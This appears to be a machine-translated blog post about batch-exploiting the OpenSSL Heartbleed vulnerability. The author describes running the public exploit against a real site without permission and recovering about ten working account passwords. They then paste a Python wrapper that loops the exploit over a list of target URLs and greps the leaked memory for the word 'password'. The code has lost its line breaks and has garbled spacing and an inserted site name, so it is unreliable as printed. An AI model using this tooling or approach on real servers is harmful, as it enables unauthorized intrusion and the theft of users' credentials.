Batch detection of openssl (heartbleed) Vulnerabilities

Recently, the openssl (heartbleed) vulnerability is quite popular. It seems that some people on Weibo have said there are not many dangers in the past few days. However, according to the test, it is found that the damage is still relatively large.

So I found a site and used a for loop to capture 100 files in batches. It took about 10 minutes to complete the process. There were about 10 accounts and passwords to search for. Basically, I could log on to the site, if it is a website with a large traffic volume, more websites may be caught in a certain period of time! I used the existing EXP to write a program to facilitate batch detection of this vulnerability, mainly by practicing python. I feel that the process is too slow. Paste the Code:

# Coding: utf-8import subprocessimport time # traverse URLdef readtar (targetpath) in the target file: f = open (targetpath, "r") for url in f. readlines (): url = url. strip ("\ r \ n") exploit (url) # execute Exp, get the original echo after execution, and send it to getres for processing def exploit (url ): cmd = "python" + r "e: \ 0day \ openssl \ ssltest. py "+ url print cmd expover = subprocess. popen (cmd, stdout = subprocess. PIPE) time. sleep (5) expres = expover. stdout. read () print expres ''' # execute echo filtering to obtain the password string def getres (expres): ispwd = False if expres. find ("password")> 0: ispwd = True if ispwd = True: keywords = "password" before = expres [expres. index (keywords)-280: expres. index (keywords)] after = expres [expres. index (keywords) + len (keywords): expres. index (keywords) + len (keywords) + 140] www.bkjia.com passallstr = before + keywords + after print passallstr if len (passallstr) = 0: print "Maybe no pass or user in strings" ''' if _ name __= = '_ main _': # specify the target file targetfile = r "e: \ 0day \ url.txt "readtar (targetfile)

It mainly relies on the published exp, but adds a simple file to read and traverse the code tested one by one. It also wants to print only a few lines before and after the keyword "password, finally, it seems that there are some problems, so I commented out.